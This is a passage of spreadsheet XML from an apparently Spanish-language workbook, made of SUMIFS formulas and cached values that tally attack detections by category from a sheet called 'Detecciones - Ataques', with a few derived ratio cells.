        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD8)</f>
        <v>0</v>
      </c>
      <c r="AE9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE8)</f>
        <v>0</v>
      </c>
      <c r="AF9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF8)</f>
        <v>130</v>
      </c>
      <c r="AG9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG8)</f>
        <v>5</v>
      </c>
      <c r="AH9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH8)</f>
        <v>0</v>
      </c>
      <c r="AI9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI8)</f>
        <v>9</v>
      </c>
      <c r="AJ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ8)</f>
        <v>90</v>
      </c>
      <c r="AK9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK8)</f>
        <v>18</v>
      </c>
      <c r="AL9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL8)</f>
        <v>0</v>
      </c>
      <c r="AM9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM8)</f>
        <v>27</v>
      </c>
      <c r="AN9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN8)</f>
        <v>0</v>
      </c>
      <c r="AO9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO8)</f>
        <v>10</v>
      </c>
      <c r="AP9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP8)</f>
        <v>2</v>
      </c>
      <c r="AQ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ8)</f>
        <v>0</v>
      </c>
      <c r="AR9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR8)</f>
        <v>3</v>
      </c>
      <c r="AS9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS8)</f>
        <v>0</v>
      </c>
      <c r="AT9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT8)</f>
        <v>7</v>
      </c>
      <c r="AU9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU8)</f>
        <v>11</v>
      </c>
      <c r="AV9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV8)</f>
        <v>3</v>
      </c>
      <c r="AW9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW8)</f>
        <v>1</v>
      </c>
      <c r="AX9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX8)</f>
        <v>1</v>
      </c>
      <c r="AY9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY8)</f>
        <v>3</v>
      </c>
      <c r="AZ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ8)</f>
        <v>10</v>
      </c>
      <c r="BA9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA8)</f>
        <v>11</v>
      </c>
      <c r="BB9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB8)</f>
        <v>3297</v>
      </c>
      <c r="BC9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC8)</f>
        <v>6615</v>
      </c>
      <c r="BD9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD8)</f>
        <v>0</v>
      </c>
      <c r="BE9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE8)</f>
        <v>0</v>
      </c>
      <c r="BF9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF8)</f>
        <v>200</v>
      </c>
      <c r="BG9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG8)</f>
        <v>0</v>
      </c>
      <c r="BH9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH8)</f>
        <v>6</v>
      </c>
      <c r="BI9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI8)</f>
        <v>2</v>
      </c>
      <c r="BJ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ8)</f>
        <v>0</v>
      </c>
      <c r="BK9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK8)</f>
        <v>1</v>
      </c>
      <c r="BL9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL8)</f>
        <v>7</v>
      </c>
      <c r="BM9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM8)</f>
        <v>0</v>
      </c>
      <c r="BN9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN8)</f>
        <v>147</v>
      </c>
      <c r="BO9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO8)</f>
        <v>266</v>
      </c>
      <c r="BP9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP8)</f>
        <v>0</v>
      </c>
      <c r="BQ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ8)</f>
        <v>3</v>
      </c>
      <c r="BR9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR8)</f>
        <v>2</v>
      </c>
      <c r="BS9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS8)</f>
        <v>1</v>
      </c>
      <c r="BT9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT8)</f>
        <v>0</v>
      </c>
      <c r="BU9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU8)</f>
        <v>2</v>
      </c>
      <c r="BV9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV8)</f>
        <v>1</v>
      </c>
      <c r="BW9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW8)</f>
        <v>15</v>
      </c>
      <c r="BX9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX8)</f>
        <v>88</v>
      </c>
      <c r="BY9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY8)</f>
        <v>2</v>
      </c>
      <c r="BZ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ8)</f>
        <v>12</v>
      </c>
      <c r="CA9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA8)</f>
        <v>0</v>
      </c>
      <c r="CB9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB8)</f>
        <v>188</v>
      </c>
      <c r="CC9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC8)</f>
        <v>1</v>
      </c>
      <c r="CD9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD8)</f>
        <v>27</v>
      </c>
      <c r="CE9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE8)</f>
        <v>113</v>
      </c>
      <c r="CF9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF8)</f>
        <v>7</v>
      </c>
      <c r="CG9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG8)</f>
        <v>0</v>
      </c>
      <c r="CH9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH8)</f>
        <v>65841</v>
      </c>
      <c r="CI9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI8)</f>
        <v>1002</v>
      </c>
      <c r="CJ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ8)</f>
        <v>0</v>
      </c>
      <c r="CK9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK8)</f>
        <v>13</v>
      </c>
      <c r="CL9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL8)</f>
        <v>0</v>
      </c>
      <c r="CM9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM8)</f>
        <v>2</v>
      </c>
      <c r="CN9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN8)</f>
        <v>10</v>
      </c>
      <c r="CO9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO8)</f>
        <v>0</v>
      </c>
      <c r="CP9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP8)</f>
        <v>0</v>
      </c>
      <c r="CQ9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ8)</f>
        <v>0</v>
      </c>
      <c r="CR9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR8)</f>
        <v>0</v>
      </c>
      <c r="CS9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS8)</f>
        <v>76</v>
      </c>
      <c r="CT9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT8)</f>
        <v>2</v>
      </c>
      <c r="CU9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU8)</f>
        <v>26</v>
      </c>
      <c r="CV9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV8)</f>
        <v>0</v>
      </c>
      <c r="CW9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW8)</f>
        <v>911</v>
      </c>
      <c r="CX9" s="173">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX8)</f>
        <v>116</v>
      </c>
      <c r="CY9" s="603">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$M$3:$M$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY8)</f>
        <v>17</v>
      </c>
      <c r="CZ9" s="173"/>
      <c r="DA9" s="173"/>
      <c r="DB9" s="173"/>
      <c r="DC9" s="173"/>
      <c r="DD9" s="604" t="s">
        <v>2093</v>
      </c>
      <c r="DE9" s="718">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD9,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>17</v>
      </c>
      <c r="DF9" s="719">
        <v>9.0</v>
      </c>
      <c r="DG9" s="337">
        <f t="shared" ref="DG9:DG12" si="1">DF9/DE9</f>
        <v>0.5294117647</v>
      </c>
      <c r="DH9" s="719">
        <f t="shared" ref="DH9:DH12" si="2">DE9-DF9</f>
        <v>8</v>
      </c>
      <c r="DI9" s="720">
        <f t="shared" ref="DI9:DI12" si="3">1-DG9</f>
        <v>0.4705882353</v>
      </c>
      <c r="DJ9" s="719">
        <v>2.0</v>
      </c>
      <c r="DK9" s="20">
        <v>0.0</v>
      </c>
      <c r="DL9" s="20">
        <v>0.0</v>
      </c>
      <c r="DM9" s="20">
        <v>13.0</v>
      </c>
      <c r="DN9" s="336">
        <f t="shared" ref="DN9:DN12" si="4">DM9/DE9</f>
        <v>0.7647058824</v>
      </c>
      <c r="DO9" s="336">
        <f t="shared" ref="DO9:DO12" si="5">1-DN9</f>
        <v>0.2352941176</v>
      </c>
      <c r="DP9" s="721">
        <f t="shared" ref="DP9:DP12" si="6">DF9+DJ9</f>
        <v>11</v>
      </c>
      <c r="DR9" s="610"/>
      <c r="DS9" s="610"/>
      <c r="DT9" s="611" t="s">
        <v>2093</v>
      </c>
      <c r="DU9" s="612">
        <f>DF9/'(D) - Análisis Resultados I - S'!EB28</f>
        <v>1.8</v>
      </c>
      <c r="DV9" s="173"/>
      <c r="DW9" s="611" t="s">
        <v>2093</v>
      </c>
      <c r="DX9" s="612">
        <f t="shared" ref="DX9:DX12" si="7">DF9/DE9</f>
        <v>0.5294117647</v>
      </c>
      <c r="DY9" s="722">
        <v>0.5294117647058824</v>
      </c>
      <c r="DZ9" s="722"/>
      <c r="EA9" s="722"/>
      <c r="EE9" s="173"/>
      <c r="EF9" s="403" t="s">
        <v>2714</v>
      </c>
      <c r="EG9" s="403" t="s">
        <v>2715</v>
      </c>
      <c r="EH9" s="403" t="s">
        <v>2652</v>
      </c>
      <c r="EI9" s="403" t="s">
        <v>2653</v>
      </c>
      <c r="EJ9" s="403"/>
      <c r="EK9" s="403"/>
      <c r="EL9" s="403"/>
      <c r="EM9" s="403"/>
      <c r="EN9" s="403"/>
      <c r="EO9" s="403"/>
      <c r="EP9" s="713"/>
      <c r="EQ9" s="714"/>
      <c r="ER9" s="723" t="s">
        <v>2448</v>
      </c>
      <c r="ES9" s="724" t="s">
        <v>2654</v>
      </c>
      <c r="ET9" s="724" t="s">
        <v>2655</v>
      </c>
      <c r="EU9" s="724" t="s">
        <v>2656</v>
      </c>
      <c r="EV9" s="714"/>
      <c r="EW9" s="725"/>
      <c r="EX9" s="714"/>
      <c r="EY9" s="714"/>
      <c r="EZ9" s="173"/>
      <c r="FA9" s="173"/>
      <c r="FB9" s="173"/>
      <c r="FC9" s="173"/>
      <c r="FD9" s="173"/>
      <c r="FE9" s="173"/>
      <c r="FF9" s="173"/>
      <c r="FG9" s="173"/>
      <c r="FH9" s="173"/>
      <c r="FI9" s="173"/>
      <c r="FJ9" s="173"/>
      <c r="FK9" s="173"/>
      <c r="FL9" s="173"/>
      <c r="FM9" s="173"/>
      <c r="FN9" s="173"/>
      <c r="FO9" s="173"/>
      <c r="FP9" s="173"/>
      <c r="FQ9" s="173"/>
      <c r="FR9" s="173"/>
      <c r="FS9" s="173"/>
      <c r="FT9" s="173"/>
      <c r="FU9" s="173"/>
    </row>
    <row r="10">
      <c r="D10" s="434"/>
      <c r="E10" s="354"/>
      <c r="F10" s="377"/>
      <c r="G10" s="352" t="s">
        <v>2464</v>
      </c>
      <c r="H10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,H8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; H8 &amp; "*") </f>
        <v>9388</v>
      </c>
      <c r="I10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,I8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; I8 &amp; "*") </f>
        <v>6951</v>
      </c>
      <c r="J10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,J8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; J8 &amp; "*") </f>
        <v>124</v>
      </c>
      <c r="K10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,K8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; K8 &amp; "*") </f>
        <v>12</v>
      </c>
      <c r="L10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,L8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; L8 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="M10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,M8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; M8 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="N10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,N8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; N8 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="O10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,O8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; O8 &amp; "*") </f>
        <v>8473</v>
      </c>
      <c r="P10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,P8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; P8 &amp; "*") </f>
        <v>146</v>
      </c>
      <c r="Q10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Q8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Q8 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="R10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,R8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; R8 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="S10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S8 &amp; "*") </f>
        <v>66843</v>
      </c>
      <c r="T10" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T8) + SUMIFS('(B) - Detecciones - Ataques'!$N$3:$N$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T8 &amp; "*") </f>
        <v>6</v>
